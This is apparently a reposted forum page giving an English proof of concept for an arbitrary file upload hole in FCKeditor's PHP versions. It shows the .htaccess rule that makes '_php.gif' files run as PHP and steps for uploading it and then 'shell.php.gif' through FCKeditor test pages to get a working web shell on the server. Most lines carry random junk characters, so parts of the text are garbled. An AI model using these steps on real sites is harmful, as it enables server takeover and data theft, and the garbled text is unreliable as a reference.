FCKeditor所有php版本Upload上传漏洞
% m& `' C6 z% E% Q作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
4 K' ~9 E( c& S4 V4 A减小字体 增大字体
& R0 s2 l) R- ][+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability: C$ A( ]5 o7 [" t8 C F
[+] Date: 20118 O9 Z6 x# G" P; s0 M
[+] Author : sinesafe.cn
2 `5 o7 b, j( n[+] Website : WwW.sinesafe.cn
% P& O$ S; [" b# s6 n———————————————————
' K4 R. N. N6 W8 A! a1 d: t1.create a htaccess file:
0 \6 P6 Z! W" N! D" I8 c( Zcode:
0 e5 ?5 x2 ]: L4 y9 ?<FilesMatch “_php.gif”>) @* o& `$ D5 V8 v
SetHandler application/x-httpd-php0 M3 Z H- c/ O0 q0 J3 L! K
</FilesMatch>
$ u, ]% I: y+ {2 p) n( ~; S7 }. a7 `3 l+ k
2.Now upload this htaccess with FCKeditor.$ ~+ U! k3 Y; x) s$ m- P
; ]9 T' m0 E; {
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html1 T* D( ]! m$ o2 T1 c/ U
6 I/ R$ V5 M! r O. A
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
6 e; o1 o2 D0 p5 g3 z8 R# m: o* [) Q8 S K: W0 s
———————————————————————————————-
; ]( p$ z! E; D5 w3.Now upload shell.php.gif with FCKeditor.& W: G6 Z1 ?6 M, o
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
& z: K* j$ q& W5.http://www.sinesafe.cn/anything/shell_php.gif
! `% N5 F( _, i0 w6.Now shell is available from server. |
' O6 z) H d% j% w- e1 }$ a( P
/ p& h/ S. v* t( t" v( ^ H! Y1 J7 R: u$ \/ u) G: v2 m
|
发表于 2013-10-27 17:25:21
收藏
支持
反对